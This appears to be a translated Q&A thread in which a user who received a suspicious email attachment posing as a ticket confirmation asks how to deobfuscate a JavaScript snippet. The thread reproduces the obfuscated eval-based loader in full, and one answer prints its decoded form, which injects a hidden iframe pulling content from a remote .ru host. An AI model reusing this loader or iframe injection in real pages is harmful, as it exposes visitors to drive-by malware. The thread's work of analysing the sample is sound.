反混淆/解析字符串

时间:2012-03-20 05:50:28

标签: javascript string

我今天在电子邮件附件中收到以下内容,声明这是我确实购买的机票的确认。请帮助我理解如何解构这段代码......

<script>
c = 2;
i = c - 2;
if (window.document) try {
    new c.prototype
} catch (hgberger) {
    f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
    md = 'a';
    e = window["e" + "val"];
    w = f;
    s = [];
    r = String;
    for (; 613 != i; i += 1) {
        j = i;
        s += r.fromCharCode(38 + 1 * w[j]);
    }
    e(s);
}</script>

3 个答案:

答案 0 :(得分:3)

是非模糊:

if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
            document.getElementsByTagName('body')[0].appendChild(f);
        }

答案 1 :(得分:2)

我拿了你发布的代码,然后将其逐字粘贴到http://jsfiddle.net。我改变的唯一一点(我建议这样做)是将对e(s)的调用更改为alert(s)。这样,您的浏览器就不会尝试执行嵌入代码,而只是为您显示它。

你会看到一些关于iframe和dnvfodooshdkfhha.ru的狡猾的东西,这看起来很垃圾。

答案 2 :(得分:1)

看起来该字符串是由'n'分隔的字符代码列表。如果您运行代码,最后一行替换为'alert(s)'而不是e(s),您将看到恶意软件试图'eval'的模糊代码